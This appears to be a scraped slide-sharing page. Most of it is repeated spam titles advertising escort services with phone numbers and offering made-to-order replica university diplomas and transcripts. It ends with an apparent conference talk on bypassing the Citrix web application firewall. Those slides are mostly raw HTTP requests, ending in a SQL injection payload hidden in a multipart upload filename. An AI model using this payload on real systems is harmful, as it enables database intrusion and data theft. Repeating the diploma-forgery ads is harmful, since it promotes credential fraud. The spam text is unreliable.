VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls KolkataLow Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Roomdivyansh0kumar0
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
Denver Web Design brochure for public viewing
Denver Web Design brochure for public viewingDenver Web Design brochure for public viewing
Denver Web Design brochure for public viewingbigorange77
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 

Recently uploaded (20)

Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Person
 
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICECall Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls KolkataLow Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
Denver Web Design brochure for public viewing
Denver Web Design brochure for public viewingDenver Web Design brochure for public viewing
Denver Web Design brochure for public viewing
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 

Citrix WAF bypass techniques exposed in daily hack report

  • 2. /whoami Defcon Moscow  You already know it about us  ???  PROFIT
  • 3. Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
  • 4. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
  • 5. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
  • 6. Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr